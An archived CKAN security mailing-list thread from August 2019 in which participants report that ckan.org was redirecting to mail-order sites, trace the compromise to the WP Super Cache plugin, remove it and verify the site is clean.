[CKAN-Security] Fwd: ckan.org top page defaced?
Goce Mitevski
goce.mitevski at keitaro.com
Mon Aug 5 07:26:01 UTC 2019
Hi Chiaki,
Thanks for the update.
Are things still looking good and clean on your side?
>A new vulnerability or vulnerabilities must have been found by the black hats in the meantime.
Maybe. I did some research and I can't find anything other than the
vulnerability reported in 2013. I will for sure report this.
Regards,
Goce Mitevski
On Sun, Aug 4, 2019 at 3:24 AM chiaki-ishikawa-thunderbird-account
<chiaki.ishikawa at ubin.jp> wrote:
>
> Dear Goce,
>
> Hi, this is Chiaki again.
>
> This is past 10:00 o'clock in Japan.
>
> The https://ckan.org looks good and clean (!)
>
> Google search for "ckan.org" from Yokohama, Japan (about 50 km south of
> Tokyo) does not show the redirected result any more.
>
> Great.
>
> As for 'wp-super-cache/wp-cache.php', I have no idea if new
> vulnerability is known by the security community.
> There is a five years old web page I could find about its vulnerability
> in the past:
> https://www.inmotionhosting.com/support/news/archived/wordpress-w3-total-cache-and-wp-super-cache-vulnerability
>
> A new vulnerability or vulnerabilities must have been found by the black
> hats in the meantime.
> You may want to report the problem to
> - the authors of wp-super-cache,
> - CERT-like organizations of where you live,
> - US-CERT itself, etc. or
> - all of the above.
>
> Why would anyone want to deface ckan.org? I can't think of a reason, but
> maybe a good connectivity (bandwidth), a good popularity, and above all
> the site that is using the vulnerable cache plugin(s) may be attacked
> randomly.
> If my conjecture is correct, there may be more reports of similar
> defacing in the press soon.
>
> I hope you can take a rest now.
>
> Regards,
> Chiaki
>
>
> On 2019/08/04 2:19, Goce Mitevski wrote:
> > Hi everyone,
> >
> > I've been struggling to restore the blogfarm all day long and I think
> > I'm finally into some important findings.
> >
> > I noticed that for the past few hours only one file was continuously
> > exploited - wp-super-cache/wp-cache.php. That is a file that belongs
> > to the WP Super Cache plugin and this plugin is obviously one possible
> > point of attack. I deactivated and removed it across the blogfarm.
> > That should close at least one whole and if that's the only one the
> > attacker uses, the problems might finally be resolved for good.
> >
> > In the meantime, I verified the checksums for all WordPress instances
> > and plugins across the blogfarm and all is clear.
> >
> > Do let me know if you don't see search results slowly recovering in
> > the next few hours.
> >
> > Regards,
> > Goce
> >
> > On Sat, Aug 3, 2019 at 6:04 PM chiaki-ishikawa-thunderbird-account
> > <chiaki.ishikawa at ubin.jp> wrote:
> >> Hi all,
> >>
> >> It is past midnight, 01:00 am in Japan.
> >>
> >> I am afraid the redirection of https://ckan.org comes back (!?).
> >>
> >> I believe whoever has the way to inject the malicious code in the first
> >> place has still the
> >> path through which the injection was done, or may have a new path or new
> >> paths.
> >> Hmm...
> >>
> >>
> >> Have you heard any news from other regions of the world?
> >> If I am not mistaken, the redirection code may have an intelligence to
> >> show me a webpage of a mail order house that is written in Japanese.
> >> I am afraid the injection code write may be a skilled person who
> >> incorporated the
> >> intelligence to check the origin of access and show proper website
> >> (i.e., pick up a language spoken in the accessing user's region/country.).
> >> That a malicious code shows me a Japanese web page doesn't seem to be a
> >> simple coincidence.
> >>
> >> TIA
> >>
> >>
> >> Chiaki
> >>
> >>
> >> On 2019/08/03 21:46, David Read wrote:
> >>> Much appreciated, Goce,
> >>> David
> >>>
> >>> On Fri, 2 Aug 2019 at 20:13, Goce Mitevski <goce.mitevski at keitaro.com> wrote:
> >>>> I am working on it and the problems are still not resolved entirely.
> >>>>
> >>>> Regards,
> >>>> Goce
> >>>>
> >>>> On Fri, Aug 2, 2019 at 6:07 PM David Read
> >>>>
> >>>> <david.read at hackneyworkshop.com> wrote:
> >>>>> Great, thanks Goce.
> >>>>>
> >>>>> I looked yesterday 2 hours after Chiaki's initial report and also
> >>>>> didn't see anything wrong. So I guess Adria and co fixed this quickly.
> >>>>>
> >>>>> David
> >>>>>
> >>>>> On Fri, 2 Aug 2019 at 15:23, Goce Mitevski <goce.mitevski at keitaro.com> wrote:
> >>>>>> Hi David,
> >>>>>>
> >>>>>> The malicious code and the filesystem was cleaned in the meantime.
> >>>>>> That's why you can't notice anything different at the moment.
> >>>>>>
> >>>>>> Regards,
> >>>>>> Goce Mitevski
> >>>>>>
> >>>>>> On Fri, Aug 2, 2019 at 4:29 PM David Read
> >>>>>> <david.read at hackneyworkshop.com> wrote:
> >>>>>>> It looks fine to me. What am I missing?
> >>>>>>> David
> >>>>>>>
> >>>>>>> On Thu, 1 Aug 2019 at 23:19, 石川 千秋 <chiaki.ishikawa at ubin.jp> wrote:
> >>>>>>>> Dear Adrià,
> >>>>>>>>
> >>>>>>>> You are welcome.
> >>>>>>>>
> >>>>>>>> I am glad that you are aware of the problem.
> >>>>>>>> When one of my colleagues approached me late afternoon in Japan saying that
> >>>>>>>> something is wrong with ckan.org website and I myself accessed the URL,
> >>>>>>>> my jaw dropped.
> >>>>>>>>
> >>>>>>>> We help some government agencies' open data initiative in Japan.
> >>>>>>>> Already, the cabinet office's web page disabled the "Powered by ckan" link.
> >>>>>>>> They have the staff man-power to do that. I am afraid my colleagues need to
> >>>>>>>> talk with people at Tokyo Metropolitan government and other ckan site
> >>>>>>>> people regarding this issue.
> >>>>>>>>
> >>>>>>>> I am afraid that this event put a rather negative publicity on ckan. That is
> >>>>>>>> why I wanted to make sure that CKAN people are aware ASAP.
> >>>>>>>>
> >>>>>>>> I hope you can resolve the issue at the earliest time.
> >>>>>>>>
> >>>>>>>> At the same time, I know how you feel.
> >>>>>>>> I have done a sysadmin-like job in my previous office, and a self-appointed
> >>>>>>>> admin of a rather complex home LAN/WAN.
> >>>>>>>>
> >>>>>>>> Identifying the issue, cleansing the server if necessary, etc. Ouch...
> >>>>>>>> You have my sympathy.
> >>>>>>>>
> >>>>>>>> I hope the problem is not wide-spread.
> >>>>>>>>
> >>>>>>>> Good luck (!)
> >>>>>>>>
> >>>>>>>> Best regards,
> >>>>>>>> Chiaki
> >>>>>>>>
> >>>>>>>>
> >>>>>>>> On 2019/08/01 18:10, Adrià Mercader wrote:
> >>>>>>>>> Dear Chiaki,
> >>>>>>>>>
> >>>>>>>>> Thank you very much for your report. We are aware of the issue and working
> >>>>>>>>> on a fix.
> >>>>>>>>> Apologies for the inconvenience caused.
> >>>>>>>>>
> >>>>>>>>> Best regards,
> >>>>>>>>>
> >>>>>>>>> Adrià
> >>>>>>>>>
> >>>>>>>>> On Thu, 1 Aug 2019 at 11:08, 石川 千秋 <chiaki.ishikawa at ubin.jp
> >>>>>>>>> <mailto:chiaki.ishikawa at ubin.jp>> wrote:
> >>>>>>>>>
> >>>>>>>>> Hi,
> >>>>>>>>>
> >>>>>>>>> I finally found this security at ckan.org <mailto:security at ckan.org> address.
> >>>>>>>>>
> >>>>>>>>> It looks there is a bug or possibility of web page defacing that
> >>>>>>>>> causes the
> >>>>>>>>> access to https://ckan.org/ automatically get redirected to
> >>>>>>>>> commercial mail order website web pages.
> >>>>>>>>>
> >>>>>>>>> In Japan, when I search for "ckan.org <http://ckan.org>" using google,
> >>>>>>>>> the top several hits
> >>>>>>>>> are all about the mail order houses.
> >>>>>>>>>
> >>>>>>>>> This was not the case at least a few days ago according to my colleagues.
> >>>>>>>>>
> >>>>>>>>> TIA
> >>>>>>>>>
> >>>>>>>>>
> >>>>>>>>>
> >>>>>>>>> -------- Forwarded Message --------
> >>>>>>>>> Subject: ckan.org <http://ckan.org> top page defaced?
> >>>>>>>>> Date: Thu, 1 Aug 2019 17:33:39 +0900
> >>>>>>>>> From: ishikawa <chiaki.ishikawa at ubin.jp
> >>>>>>>>> <mailto:chiaki.ishikawa at ubin.jp>>
> >>>>>>>>> To: webadmin at ckan.org <mailto:webadmin at ckan.org>,
> >>>>>>>>> postmaster at ckan.org <mailto:postmaster at ckan.org>,
> >>>>>>>>> abuse at support.gandi.net <mailto:abuse at support.gandi.net>,
> >>>>>>>>> web-admin at ckan.org <mailto:web-admin at ckan.org>
> >>>>>>>>>
> >>>>>>>>>
> >>>>>>>>>
> >>>>>>>>> Dear sirs/madams,
> >>>>>>>>>
> >>>>>>>>> By now, you must be aware that the top page access to https://ckan.org/ is
> >>>>>>>>> redirected to commercial sites (mail order houses).
> >>>>>>>>>
> >>>>>>>>> When I search ckan.org <http://ckan.org> using google, the
> >>>>>>>>> first several entries point to these commercial sites.
> >>>>>>>>>
> >>>>>>>>> (However, the subdomains of ckan.org <http://ckan.org> seem to be free
> >>>>>>>>> of such redirection.)
> >>>>>>>>>
> >>>>>>>>> I work at an office where open data initiative at regional government
> >>>>>>>>> offices is supported, and
> >>>>>>>>> some people noticed that clicking on "Powered by CKAN" results in
> >>>>>>>>> commercial
> >>>>>>>>> site web pages since this morning (Japan Standard Time).
> >>>>>>>>> The redirection may have happened last evening, but I am not sure.
> >>>>>>>>>
> >>>>>>>>> I tried to send a message using a submission page at ckan.org
> >>>>>>>>> <http://ckan.org> that could be
> >>>>>>>>> accessed via, say,
> >>>>>>>>> clicking Contact Us" web page of https://demo.ckan.org/ja/
> >>>>>>>>>
> >>>>>>>>> As I mentioned, the subdomain seems to be free from this re-direction
> >>>>>>>>> attack
> >>>>>>>>> (?).
> >>>>>>>>>
> >>>>>>>>> Anyway, it would be great if you can alert ckan people since ckan is used
> >>>>>>>>> very widely all over the world by many government offices and people
> >>>>>>>>> tend to
> >>>>>>>>> see "Powered by CKAN"
> >>>>>>>>> logo and may click it. If they see an unrelated commercial site web page
> >>>>>>>>> then, the reputation of CKAN or confidence in CKAN may diminish a bit :-(
> >>>>>>>>>
> >>>>>>>>>
> >>>>>>>>> Just thought to let you know about this unfortunate development.
> >>>>>>>>>
> >>>>>>>>>
> >>>>>>>>> I hope you can clear up this issue very soon.
> >>>>>>>>>
> >>>>>>>>>
> >>>>>>>>> Thank you in advance for your attention.
> >>>>>>>>>
> >>>>>>>>> Regards,
> >>>>>>>>>
> >>>>>>>>> Chiaki Ishikawa
> >>>>>>>>>
> >>>>>>>>>
> >>>>>>>>>
> >>>>>>>>> _______________________________________________
> >>>>>>>>> CKAN security
> >>>>>>>>> https://lists.okfn.org/mailman/listinfo/security
> >>>>>>>>> https://lists.okfn.org/mailman/options/security/adria.mercader%40okfn.org
> >>>>>>>>>
> >>>>>>>>> Repo: https://github.com/ckan/ckan-security
> >>>>>>>>>
> >>>>>>>> _______________________________________________
> >>>>>>>> CKAN security
> >>>>>>>> https://lists.okfn.org/mailman/listinfo/security
> >>>>>>>> https://lists.okfn.org/mailman/options/security/david.read%40hackneyworkshop.com
> >>>>>>>>
> >>>>>>>> Repo: https://github.com/ckan/ckan-security
> >>>>>>
> >>>>>> --
> >>>>>>
> >>>>>> Goce Mitevski
> >>>>>> Chief Design Officer,
> >>>>>> Keitaro Inc.
> >>>>>>
> >>>>>> goce.mitevski at keitaro.com
> >>>>>> http://www.keitaro.com/
> >>>>
> >>>> --
> >>>>
> >>>> Goce Mitevski
> >>>> Chief Design Officer,
> >>>> Keitaro Inc.
> >>>>
> >>>> goce.mitevski at keitaro.com
> >>>> http://www.keitaro.com/
> >
>
--
Goce Mitevski
Chief Design Officer,
Keitaro Inc.
goce.mitevski at keitaro.com
http://www.keitaro.com/
More information about the Security
mailing list